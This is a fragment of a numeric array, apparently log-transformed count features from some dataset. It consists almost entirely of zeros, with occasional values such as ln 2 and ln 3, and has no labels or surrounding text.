0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.545177444479562, 0.0, 0.0,\n 0.0, 0.0, 0, 1.9459101490553132, 0.6931471805599453, 1.6094379124341003,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0,\n 1.6094379124341003, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 1.9459101490553132, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 2.1972245773362196, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 4.518263445217986, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 5.0301047650807, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.58351893845611, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 1.9459101490553132, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 6.731743096669168, 0.0, 0.0, 0, 0.0, 0, \n 5.375278407684165, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 6.578517662373903, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0, 2.302585092994046, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0, 0, 0.0, 5.0301047650807, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 1.791759469228055, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, \n 10.112432770990234, 0, 0.0, 0.0, 0.0, 9.840079788958109, 0.0, 0.0, 0.0,\n 0.0, 0.0, 7.408770583887592, 0.0, 0.0, 0.0, 10.137128175207733, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.6931471805599453, 9.840079788958109, 0.0, 0.0, 0.0, 0.0, \n 9.453194522336574, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 11.228574125921016, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 5.952096120109145, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 9.897636166013237, \n 0.0, 0.0, 0, 5.952096120109145, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.6931471805599453, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.41610040220442, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 1.791759469228055, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 